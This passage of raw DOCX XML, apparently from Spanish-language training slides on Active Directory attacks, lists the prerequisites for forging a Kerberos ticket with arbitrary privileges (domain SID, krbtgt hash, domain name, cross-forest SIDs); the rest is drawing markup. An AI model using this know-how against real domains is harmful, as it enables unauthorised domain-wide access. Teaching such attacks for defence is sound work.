          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>cualquier</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> privilegio.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CD00E4" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EA7E232" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="114"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="099DA149" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1874"/>
        </w:tabs>
        <w:ind w:left="1874" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Requisitos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F413094" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="131"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02F18D6A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2594"/>
        </w:tabs>
        <w:ind w:left="2594" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>SID de dominio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CAC180" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2594"/>
        </w:tabs>
        <w:spacing w:before="50"/>
        <w:ind w:left="2594" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Krbtgt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086E0281" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2594"/>
        </w:tabs>
        <w:spacing w:before="48"/>
        <w:ind w:left="2594" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Nombre de dominio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F62BF67" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2594"/>
        </w:tabs>
        <w:spacing w:before="50"/>
        <w:ind w:left="2594" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>SIDS (en ataques entre bosques)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A55DE57" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="720" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="399" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B3F6F39"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431296" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3E82ACC5" wp14:editId="362AD75C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>248158</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>18283</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="10189845" cy="6513830"/>
                <wp:effectExtent l="0" t="0" r="0" b="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9845" cy="6513830"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="10189845" cy="6513830"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="542" name="Image 542"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId67" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="1505966" y="0"/>
                            <a:ext cx="8683750" cy="6513608"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="543" name="Image 543"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId283" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="3601211" y="191393"/>
                            <a:ext cx="5024755" cy="355346"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="544" name="Graphic 544"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4133341" y="4706116"/>
                            <a:ext cx="3933825" cy="76200"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="3933825" h="76200">
                                <a:moveTo>
                                  <a:pt x="3857625" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="3857625" y="76200"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3921125" y="44450"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3870325" y="44450"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3870325" y="31750"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3921125" y="31750"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3857625" y="0"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="3933825" h="76200">
                                <a:moveTo>
                                  <a:pt x="3857625" y="31750"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="0" y="31750"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="44450"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3857625" y="44450"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3857625" y="31750"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="3933825" h="76200">
                                <a:moveTo>
                                  <a:pt x="3921125" y="31750"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="3870325" y="31750"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3870325" y="44450"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3921125" y="44450"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3933825" y="38100"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3921125" y="3175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3757930" y="2783589"/>
                            <a:ext cx="1866264" cy="1816735"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="1866264" h="1816735">
                                <a:moveTo>
                                  <a:pt x="1412367" y="81280"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1405991" y="61214"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1386586" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1337056" y="69342"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1365288" y="73825"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1361059" y="100711"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1352296" y="151638"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1343164" y="200291"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1331404" y="255638"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1320152" y="303022"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1320025" y="303415"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1319885" y="304025"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1305966" y="354609"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1290510" y="403974"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1273098" y="452005"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1273111" y="452158"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1253083" y="500888"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1230071" y="549363"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1204226" y="597192"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1204150" y="597458"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1190117" y="621030"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1175626" y="643928"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1159154" y="668197"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1159027" y="668439"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1123670" y="716026"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1085799" y="761187"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1065161" y="783602"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1065085" y="783793"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1045908" y="803503"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1043101" y="806259"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1042974" y="806386"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1020318" y="828675"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="996086" y="851039"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="995972" y="851217"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="945464" y="894981"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="914222" y="920229"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="861314" y="960755"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="797153" y="1006817"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="738124" y="1046480"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="705612" y="1067689"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="638429" y="1109853"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="603885" y="1130681"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="535787" y="1170851"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="468287" y="1209319"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="386588" y="1254506"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="234188" y="1336167"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="1457579"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8636" y="1474597"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="243078" y="1352931"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="395732" y="1271270"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="470027" y="1230122"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="542925" y="1188720"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="613664" y="1147064"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="648335" y="1126109"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="682371" y="1105027"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="715899" y="1083818"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="748538" y="1062482"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="780669" y="1041019"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="812165" y="1019556"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="872617" y="976122"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="929767" y="932180"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="983488" y="887730"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1033272" y="842645"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1078992" y="796683"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1120394" y="750189"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1157605" y="702945"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1191006" y="655193"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1220724" y="606806"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1247013" y="558038"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1270381" y="508635"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1290828" y="458851"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1308989" y="408813"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1324610" y="358521"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1338580" y="307975"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1350645" y="257048"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1361440" y="206121"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1370965" y="155067"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1379728" y="103886"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1384058" y="76796"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1412367" y="81280"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="1866264" h="1816735">
                                <a:moveTo>
                                  <a:pt x="1866125" y="489204"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1865884" y="457454"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1864766" y="426161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1864741" y="425323"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1862874" y="393954"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1862836" y="393192"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1860257" y="362077"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1860169" y="360934"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1857108" y="329946"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1856994" y="328676"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1844040" y="231521"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1833499" y="166497"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1821815" y="101346"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1809750" y="36195"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1797304" y="38481"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1809369" y="103632"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1820926" y="168529"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1831467" y="233426"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1840484" y="297942"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1844294" y="329946"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1847469" y="360934"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1847596" y="362077"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1850072" y="393192"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1850136" y="393954"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1852002" y="425323"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1852041" y="426161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1853171" y="457200"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1853425" y="489204"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1852930" y="520319"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1851431" y="551230"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1848764" y="582701"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1848827" y="582942"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1845183" y="613537"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1840560" y="643077"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1834438" y="674801"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1834438" y="675030"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1818741" y="735076"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1798193" y="792873"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1784578" y="824103"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1784464" y="824382"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1754238" y="881951"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1717167" y="938618"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1695043" y="967892"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1694700" y="968349"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1671434" y="995997"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1646542" y="1023239"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1619262" y="1050442"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1619161" y="1050607"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1561134" y="1102499"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1525778" y="1130808"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1491665" y="1156614"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1454404" y="1183132"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1416050" y="1209040"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1376299" y="1234567"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1334897" y="1259840"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1291971" y="1284986"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1252969" y="1307071"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1252804" y="1307160"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1198486" y="1336573"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1149959" y="1361884"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1107186" y="1383665"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1057910" y="1407795"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1007618" y="1431798"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="956310" y="1455674"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="903986" y="1479423"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="850646" y="1503045"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="741807" y="1549908"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="630047" y="1596390"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="451192" y="1668335"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="177520" y="1774825"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="166116" y="1745234"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="108712" y="1808226"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="193548" y="1816354"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="183896" y="1791335"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="182105" y="1786724"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="463042" y="1677289"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="634873" y="1608201"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="746760" y="1561719"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="855726" y="1514729"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="961517" y="1467231"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1012952" y="1443355"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1063371" y="1419225"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1112774" y="1394968"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1161034" y="1370457"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1208151" y="1345819"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1253871" y="1321054"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1273543" y="1309979"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1298321" y="1296035"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1341374" y="1270762"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1383030" y="1245362"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1423035" y="1219708"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1461516" y="1193673"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1498473" y="1167384"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1533525" y="1140841"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1566926" y="1114171"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1578267" y="1104430"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1598422" y="1087120"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1628013" y="1059688"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1655826" y="1032002"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1705102" y="975614"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1746758" y="917956"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1781302" y="859282"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1809242" y="799592"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1830832" y="739013"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1846834" y="677545"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1857756" y="615315"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1863979" y="552450"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1865503" y="520827"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1866125" y="489204"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:solidFill>
                            <a:srgbClr val="EC7C30"/>
                          </a:solidFill>
                        </wps:spPr>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:prstTxWarp prst="textNoShape">
                            <a:avLst/>
                          </a:prstTxWarp>
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="546" name="Graphic 546"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="6847585" y="2012192"/>
                            <a:ext cx="2053589" cy="2028189"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="2053589" h="2028189">
                                <a:moveTo>
                                  <a:pt x="74838" y="30448"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="71198" y="42617"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="277113" y="104139"/>
                                </a:lnTo>
                                <a:lnTo>
